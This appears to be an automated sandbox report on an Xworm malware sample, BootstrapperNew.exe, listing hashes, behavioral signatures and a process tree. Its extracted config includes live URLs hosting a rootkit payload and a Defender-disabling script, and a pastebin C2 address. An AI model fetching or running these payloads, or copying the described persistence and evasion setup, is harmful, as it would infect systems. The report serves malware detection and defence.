Analysis
-
max time kernel
27s -
max time network
46s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
05/03/2025, 13:10
Static task
static1
Behavioral task
behavioral1
Sample
BootstrapperNew.exe
Resource
win10v2004-20250217-en
General
-
Target
BootstrapperNew.exe
-
Size
2.9MB
-
MD5
fe2a5662b81e0050926b48325dd1567b
-
SHA1
974ed628dae46563f49acfe2a4f89a9b41a40220
-
SHA256
c5fcb6ebea1e21c19773e2735108228e8e81ed7387aa22d97235435a48a0c8fa
-
SHA512
5591a4b3d894bafb6f58dd9c97584ba23344579f1026aa4364d2cc2d0ed7815f882a064b65ab19d0c788cbc0d384ca6412e7e158fa41f0ee6bfbaeea519872c9
-
SSDEEP
49152:moWGRUiwhZqwESGRlX8iUw5fH5LGQh+wO+X8ctrK4eWprf4oznzBZAwSkc5nti1g:moWGqvZqwE9Ds/w5P5LiUDtrK4ewrf4F
Malware Config
Extracted
https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe
https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat
Extracted
xworm
-
Install_directory
%port%
-
install_file
svchost.exe
-
pastebin_url
https://pastebin.com/raw/J42c6s7r
Signatures
-
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/files/0x0012000000023a86-3.dat family_xworm behavioral1/memory/4784-15-0x0000000000E30000-0x0000000000E44000-memory.dmp family_xworm behavioral1/memory/4784-717-0x000000001D000000-0x000000001D012000-memory.dmp family_xworm behavioral1/memory/5552-862-0x0000000000C60000-0x0000000000C74000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2708 created 616 2708 MasonRootkit.exe 5 -
Xworm family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 9 4728 powershell.exe 12 4728 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4728 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 12 4728 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation MasonRootkit.exe Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation BootstrapperNew.exe Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation WebThreatDefense (32 Bits).exe -
Executes dropped EXE 4 IoCs
pid Process 4784 WebThreatDefense (32 Bits).exe 4524 BootstrapperNew.exe 4260 MasonRootkit.exe 2708 MasonRootkit.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WebThreatDefense (32 Bits) = "C:\\Users\\Admin\\AppData\\Roaming\\WebThreatDefense (32 Bits).exe" WebThreatDefense (32 Bits).exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 11 raw.githubusercontent.com 12 raw.githubusercontent.com 18 pastebin.com 19 pastebin.com 39 raw.githubusercontent.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2708 set thread context of 4416 2708 MasonRootkit.exe 102 -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Logs\CBS\CBS.log TrustedInstaller.exe File created C:\Windows\WebThreatDefense (32 Bits).exe BootstrapperNew.exe File created C:\Windows\Logs\CBS\CBS.log TrustedInstaller.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BootstrapperNew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1624 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe -
Modifies data under HKEY_USERS 8 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\00184012963234A8 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000434c12d1fab3eb4695f545491a0a7d2800000000020000000000106600000001000020000000621a0f2f046d8fe47a341806f82ee8e873ac76c0764823ae40fc90cc4f54aa62000000000e8000000002000020000000a6a68e0d231ba6652e3aadf8ccdd40f418ab2801a1d4344f9b5c3ee28e8b9e14800000000f6ad20a09ffefe9fc80449a2735adcdea64b89ba3a5ba06052d2e3f535387836ccb21772606f6c7473e2edaf08edc75a377d196aba10cbadbe275cd675ea3130901bb714d51b32abfa3667f476c34fc34dacd4d63b552aa80d7b6b3c4139dab4056abd6aba79f9e124001dbd73163df4540467666c5c006d5587836d78a9cb040000000ae4693c08f5205194546400455d152d2dca1530d392c537710f02b58290946a54dd9a6b806c80d8336f7d6d9deb1230d8041f63e3070986dee3fe186c9a5dbcf mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000434c12d1fab3eb4695f545491a0a7d280000000002000000000010660000000100002000000001c5b661ae4d550fce66a3a76cbb47ed9ebd4626de28c117c81e47527cdbce66000000000e8000000002000020000000422153a03bdad1f7ca40a01aa2c7dd35c55345a82e7c8aefa6871973333652f410060000ccd943d503f9130536f7b28a7a3fa06d8fb896ecc65f3fce22d4df6098df7a00dd74a8c4d7693560c15313e38c09fd637c4ccea5967f3249323effa6dbc4e13399623a49120f3cddbb04cacd8e0ba05b78eb4a0387a87352af3ff1dbafa73774445062d0973f2e083da0c3b7eaac037b0b56dbf74be28fd3bfc97c6fb8809c2897b9f62e3ddb35110547a64114835c9edb7549474174c6326270349875811a75dbe9c94b885f63fda759145e7deeef25b3a7083fdab1efa3315f6758c015304010b6baeaa6e9c773d5d12f76cecac142f039f44b0d84cddd125403b11e118cedeb5493fc92728b831823b52765842526a9f22b0afbb1e367fa90fe580d24567d51e4338d1a64481ae72f233adba8e2398137514106c359c5020a70a2f7456203cedf429b9c30428cb3f22f606e895d750956c6e0e9d6951eef9222cb3281b75625cb4733a1fe2625f6821d7ad97ecfed309428dd6a1f2e1737b024cd04d7130d02c55d14e57065564b497e3528f9fcde37ab1f130349f50f65b252c49fd5d0904e5700a7e39450da1400c112fe17c45ba02b11c84cee74714ba248f4607b8c5d3f33f59eba23fe75ea025475b9cc0f5ae6657b22ba1e5c9026c7e482624d5a5dfc3f6ed58df8993284a47097883aa1bd350a1a5ed00a9a36d1d7f8b53f8b30e1360f03705d5981248489790716c4f507eaf63bdd9bdaffecf4a9373f7b78c018130eef1cba1eccbd864eef5174e01282a8f9d8da43fc28c2cf7fbfd2f926088757bf6f70c986233930f9a2a0abb20705d9803520dbe375af48fc8c28f5c143111c216177d9fa2cc29081015c7d568ddadb624e28ff54c1ebef0619ea6f66d484a6db7617c652921e6ca1319bf7c46a7c5a7bfec9f1a290c59e918e758784007e412bc6097bd6da8aa9d707ad210efe32387680b14aeeb27b19db7d8d3a9d0d9dec64dc0b5447ad68b85d350765730fdedd536cd6e38098bffae18118822943eed17ac56c6dc339e226ed0aee5bc01dabfd43b67d0d1662c1dc4de1a2e298215a419f414e001d27bd77e008d087e57360ffb24f39cd7779e91404faba6975d1f8af7de27506b006718660fe9340127acaa62ff4093a02d4c348204ee3be031812a9175ecd7e82460e68770b930788e4ca634612af5901714184c5647e4e771eaa5791580ded71f771985d32dc3cdaad12fbeffa512c5f376953f29c06b8244da85f6a2dc722d5b8e143d1e2787162aad3cd487ea96520380eb13898a07854005505eec527eed93f0245bcfb5ac1921e5ca76438e2fff5b96019c30f51d41a7b878fb9b65ba4e5a86192f871f724cac7ddb2f2e3a799f76e4399a036bbaeb8b2916e5575e1e169685717ba0edfd78176b9cb8eb6cd0256429b35f7236d57617dd16e430988cc2b51e826db668867b19a832a9d8bf840b54d1c7c35467d91d542878729fbfcbd2e21fd17810230f9181d7129c2573a6f6b0ec9a7a83d291c629085b9c97bf2c108a10b7e94c7fe2dbcdaac622708f3a0d1c2c8b75af706f55f376ca7e0ba181fb38b8e4060e12293438e9a14e1f7b5d9fed2c68c6caf6714dca1a1097bd9f6e937cab63cc755f13c4f7d08010ee2b2914be16f80a582b916240c714cf6f0766fc940860fe12280739bc456f49371d603edb38b83cd297e28d1729b0e1db4c84ef634c780d4fd3401399ab7981623ac46470b180d447acfc08ea8aa132a0058010954fa88ccf8671c1f6fd7c86cfc9fa92cc149ea7dad26fa8c1b756927662004092d8c030ba61afd183c58ced6f769feac684ba66fa126ed408b7f58a0f62a18712c9339f5566cf12c579914d5ca08fa02008c53c813af50a3690d024519b0747566f4019bf9f5f276f69b9c221788aa7564ba4ea2780d4ce63ea958546fac4dc45316adafbe529606cb6f48990ae97b2b67af71b11f10882d443009d88f0e4a4e077fe4ec998ee15a2235367a3d4e1b65d4a895d98b397546ede4f46de13f6a084a4f724f8e9eefe5de1a67b764468bddca8e6c04250ee52d210d71bd55265a252f29cbb7115d6f51a6ac34c1f55aa71292066935553e41470c2af15014f431368f62f04340d9912f3b82a4e8c63bdbab913d359624730783b7144bec881f38a159ab0eb78be61bbf35f01bb862d665a6681721220ccdfe1c69414b62e58ae616e970c9b9d737de3fa3fd400000001189042078fa6a670415bb1133bc1e44b2e40943587e788c989a5cdd2cd8de25967d9334619b2d5ad14111782e4fb78dc6ebffa0afe8000404c58b3267c0cb8a mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "00184012963234A8" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00184012963234A8" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2468 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2548 powershell.exe 2548 powershell.exe 4728 powershell.exe 4728 powershell.exe 2708 MasonRootkit.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4180 wmiprvse.exe 4180 wmiprvse.exe 4180 wmiprvse.exe 4180 wmiprvse.exe 4180 wmiprvse.exe 4180 wmiprvse.exe 4180 wmiprvse.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4784 WebThreatDefense (32 Bits).exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4784 WebThreatDefense (32 Bits).exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4784 WebThreatDefense (32 Bits).exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe 4416 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3516 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4784 WebThreatDefense (32 Bits).exe Token: SeDebugPrivilege 2548 powershell.exe Token: SeDebugPrivilege 4728 powershell.exe Token: SeDebugPrivilege 2708 MasonRootkit.exe Token: SeDebugPrivilege 2708 MasonRootkit.exe Token: SeDebugPrivilege 4416 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2160 svchost.exe Token: SeIncreaseQuotaPrivilege 2160 svchost.exe Token: SeSecurityPrivilege 2160 svchost.exe Token: SeTakeOwnershipPrivilege 2160 svchost.exe Token: SeLoadDriverPrivilege 2160 svchost.exe Token: SeSystemtimePrivilege 2160 svchost.exe Token: SeBackupPrivilege 2160 svchost.exe Token: SeRestorePrivilege 2160 svchost.exe Token: SeShutdownPrivilege 2160 svchost.exe Token: SeSystemEnvironmentPrivilege 2160 svchost.exe Token: SeUndockPrivilege 2160 svchost.exe Token: SeManageVolumePrivilege 2160 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2160 svchost.exe Token: SeIncreaseQuotaPrivilege 2160 svchost.exe Token: SeSecurityPrivilege 2160 svchost.exe Token: SeTakeOwnershipPrivilege 2160 svchost.exe Token: SeLoadDriverPrivilege 2160 svchost.exe Token: SeSystemtimePrivilege 2160 svchost.exe Token: SeBackupPrivilege 2160 svchost.exe Token: SeRestorePrivilege 2160 svchost.exe Token: SeShutdownPrivilege 2160 svchost.exe Token: SeSystemEnvironmentPrivilege 2160 svchost.exe Token: SeUndockPrivilege 2160 svchost.exe Token: SeManageVolumePrivilege 2160 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2160 svchost.exe Token: SeIncreaseQuotaPrivilege 2160 svchost.exe Token: SeSecurityPrivilege 2160 svchost.exe Token: SeTakeOwnershipPrivilege 2160 svchost.exe Token: SeLoadDriverPrivilege 2160 svchost.exe Token: SeSystemtimePrivilege 2160 svchost.exe Token: SeBackupPrivilege 2160 svchost.exe Token: SeRestorePrivilege 2160 svchost.exe Token: SeShutdownPrivilege 2160 svchost.exe Token: SeSystemEnvironmentPrivilege 2160 svchost.exe Token: SeUndockPrivilege 2160 svchost.exe Token: SeManageVolumePrivilege 2160 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2160 svchost.exe Token: SeIncreaseQuotaPrivilege 2160 svchost.exe Token: SeSecurityPrivilege 2160 svchost.exe Token: SeTakeOwnershipPrivilege 2160 svchost.exe Token: SeLoadDriverPrivilege 2160 svchost.exe Token: SeSystemtimePrivilege 2160 svchost.exe Token: SeBackupPrivilege 2160 svchost.exe Token: SeRestorePrivilege 2160 svchost.exe Token: SeShutdownPrivilege 2160 svchost.exe Token: SeSystemEnvironmentPrivilege 2160 svchost.exe Token: SeUndockPrivilege 2160 svchost.exe Token: SeManageVolumePrivilege 2160 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2160 svchost.exe Token: SeIncreaseQuotaPrivilege 2160 svchost.exe Token: SeSecurityPrivilege 2160 svchost.exe Token: SeTakeOwnershipPrivilege 2160 svchost.exe Token: SeLoadDriverPrivilege 2160 svchost.exe Token: SeSystemtimePrivilege 2160 svchost.exe Token: SeBackupPrivilege 2160 svchost.exe Token: SeRestorePrivilege 2160 svchost.exe Token: SeShutdownPrivilege 2160 svchost.exe Token: SeSystemEnvironmentPrivilege 2160 svchost.exe -
Suspicious use of FindShellTrayWindow 15 IoCs
pid Process 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 3516 Explorer.EXE 3516 Explorer.EXE -
Suspicious use of SendNotifyMessage 13 IoCs
pid Process 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2284 wrote to memory of 2548 2284 BootstrapperNew.exe 86 PID 2284 wrote to memory of 2548 2284 BootstrapperNew.exe 86 PID 2284 wrote to memory of 2548 2284 BootstrapperNew.exe 86 PID 2284 wrote to memory of 4784 2284 BootstrapperNew.exe 88 PID 2284 wrote to memory of 4784 2284 BootstrapperNew.exe 88 PID 2284 wrote to memory of 4524 2284 BootstrapperNew.exe 89 PID 2284 wrote to memory of 4524 2284 BootstrapperNew.exe 89 PID 4784 wrote to memory of 4728 4784 WebThreatDefense (32 Bits).exe 91 PID 4784 wrote to memory of 4728 4784 WebThreatDefense (32 Bits).exe 91 PID 4728 wrote to memory of 4260 4728 powershell.exe 94 PID 4728 wrote to memory of 4260 4728 powershell.exe 94 PID 4784 wrote to memory of 2468 4784 WebThreatDefense (32 Bits).exe 95 PID 4784 wrote to memory of 2468 4784 WebThreatDefense (32 Bits).exe 95 PID 4260 wrote to memory of 2708 4260 MasonRootkit.exe 99 PID 4260 wrote to memory of 2708 4260 MasonRootkit.exe 99 PID 4260 wrote to memory of 1800 4260 MasonRootkit.exe 100 PID 4260 wrote to memory of 1800 4260 MasonRootkit.exe 100 PID 2708 wrote to memory of 4416 2708 MasonRootkit.exe 102 PID 2708 wrote to memory of 4416 2708 MasonRootkit.exe 102 PID 2708 wrote to memory of 4416 2708 MasonRootkit.exe 102 PID 2708 wrote to memory of 4416 2708 MasonRootkit.exe 102 PID 2708 wrote to memory of 4416 2708 MasonRootkit.exe 102 PID 2708 wrote to memory of 4416 2708 MasonRootkit.exe 102 PID 2708 wrote to memory of 4416 2708 MasonRootkit.exe 102 PID 2708 wrote to memory of 4416 2708 MasonRootkit.exe 102 PID 2708 wrote to memory of 4416 2708 MasonRootkit.exe 102 PID 2708 wrote to memory of 4416 2708 MasonRootkit.exe 102 PID 2708 wrote to memory of 4416 2708 MasonRootkit.exe 102 PID 2708 wrote to memory of 4416 2708 MasonRootkit.exe 102 PID 2708 wrote to memory of 4416 2708 MasonRootkit.exe 102 PID 1800 wrote to memory of 1624 1800 cmd.exe 103 PID 1800 wrote to memory of 1624 1800 cmd.exe 103 PID 4416 wrote to memory of 616 4416 dllhost.exe 5 PID 4416 wrote to memory of 684 4416 dllhost.exe 7 PID 4416 wrote to memory of 956 4416 dllhost.exe 12 PID 4416 wrote to memory of 380 4416 dllhost.exe 13 PID 4416 wrote to memory of 520 4416 dllhost.exe 14 PID 4416 wrote to memory of 1004 4416 dllhost.exe 15 PID 684 wrote to memory of 2132 684 lsass.exe 39 PID 4416 wrote to memory of 1144 4416 dllhost.exe 17 PID 4416 wrote to memory of 1152 4416 dllhost.exe 18 PID 4416 wrote to memory of 1160 4416 dllhost.exe 19 PID 4416 wrote to memory of 1196 4416 dllhost.exe 20 PID 4416 wrote to memory of 1248 4416 dllhost.exe 21 PID 4416 wrote to memory of 1328 4416 dllhost.exe 22 PID 4416 wrote to memory of 1340 4416 dllhost.exe 23 PID 4416 wrote to memory of 1404 4416 dllhost.exe 24 PID 4416 wrote to memory of 1412 4416 dllhost.exe 25 PID 4416 wrote to memory of 1540 4416 dllhost.exe 26 PID 4416 wrote to memory of 1548 4416 dllhost.exe 27 PID 4416 wrote to memory of 1704 4416 dllhost.exe 28 PID 4416 wrote to memory of 1712 4416 dllhost.exe 29 PID 4416 wrote to memory of 1776 4416 dllhost.exe 30 PID 4416 wrote to memory of 1804 4416 dllhost.exe 31 PID 4416 wrote to memory of 1852 4416 dllhost.exe 32 PID 4416 wrote to memory of 1904 4416 dllhost.exe 33 PID 4416 wrote to memory of 1916 4416 dllhost.exe 34 PID 4416 wrote to memory of 1992 4416 dllhost.exe 35 PID 4416 wrote to memory of 2044 4416 dllhost.exe 36 PID 4416 wrote to memory of 2076 4416 dllhost.exe 37 PID 4416 wrote to memory of 2132 4416 dllhost.exe 39 PID 4416 wrote to memory of 2160 4416 dllhost.exe 40 PID 4416 wrote to memory of 2344 4416 dllhost.exe 41 PID 4416 wrote to memory of 2476 4416 dllhost.exe 42 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:380
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1dcb2089-4d0c-4f25-ac3e-1501bcc410c0}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4416
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:520
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1152
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1160 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2764
-
-
C:\Users\Admin\AppData\Roaming\WebThreatDefense (32 Bits).exe"C:\Users\Admin\AppData\Roaming\WebThreatDefense (32 Bits).exe"2⤵PID:5552
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1248
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1404
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1412
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2664
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1540
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1548
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1704
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1712
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1776
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1804
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1852
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1904
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1916
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1992
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2044
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2076
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2132
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2160
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2820
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2840
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2860
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2868
-
